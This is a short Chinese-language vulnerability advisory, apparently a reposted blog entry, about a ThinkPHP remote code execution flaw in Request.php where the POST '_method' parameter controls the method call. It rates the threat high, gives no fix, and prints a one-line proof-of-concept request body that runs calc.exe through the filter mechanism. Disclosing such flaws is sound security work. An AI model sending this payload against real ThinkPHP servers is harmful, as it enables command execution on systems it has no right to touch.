释放双眼,带上耳机,听听看~!
漏洞描述近日有媒体曝出最新的tp漏洞,该漏洞存在于\thinkphp\library\think\Request.php文件中method函数,其中$method变量是$this->method,其同等于POST的”_method”参数值导致了漏洞的发生威胁等级高修复方案:暂无修复方案POCc=
漏洞描述
近日有媒体曝出最新的tp漏洞,该漏洞存在于\thinkphp\library\think\Request.php文件中method函数,其中$method变量是$this->method,其同等于POST的”_method”参数值导致了漏洞的发生
威胁等级
高
修复方案:
暂无修复方案
POC
c=exec&f=calc.exe&&_method=filter&触发条件:
需设置忽略异常提示
漏洞证明
参考链接:http://115.198.56.141:19300/wordpress/index.php/2019/01/15/thinkphp5-1-5-2-rec/
